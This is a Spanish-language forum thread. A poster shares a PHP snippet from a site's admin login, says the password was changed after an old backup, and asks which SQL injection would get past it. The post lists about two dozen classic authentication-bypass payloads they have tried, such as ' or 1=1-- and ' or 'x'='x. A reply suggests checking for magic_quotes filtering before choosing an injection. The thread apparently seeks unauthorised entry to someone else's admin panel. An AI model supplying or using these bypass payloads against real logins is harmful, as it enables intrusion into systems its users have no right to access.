Señores, estuve mirando y probando pero todavia no pude dar.
Este es el codigo de la pagina:

$idEditor=admin;

if ($idEditor != '' AND $masterPwd == 'passworddesconocido') {

Es el login al panel administrador de un site:
Conozco el codigo porque tenia un backup, pero cambiaron el password.

Que inyeccion creerian que puede servir para este caso???

Ya he probado estos:
admin'--

' or 0=0 --

" or 0=0 --

or 0=0 --

' or 0=0 #

" or 0=0 #

or 0=0 #

' or 'x'='x

" or "x"="x

') or ('x'='x

' or 1=1--

" or 1=1--

or 1=1--

' or a=a--

" or "a"="a

') or ('a'='a

") or ("a"="a

hi" or "a"="a

hi" or 1=1 --

hi' or 1=1 --

hi' or 'a'='a

hi') or ('a'='a

hi") or ("a"="a

Si alguin se anima.

Saludos.

en primero lugar creo deberias averiguar si puedes hacer todo eso osea si tiene alguna directiva de filtrado activado como el magic_quotes activado porq si es asi anda de loq estas ponendo sirve ×× luego ya ve q codigo puedes injectarle no lo hagas asi analiza el codigo bueno saludos

->
++

jajaja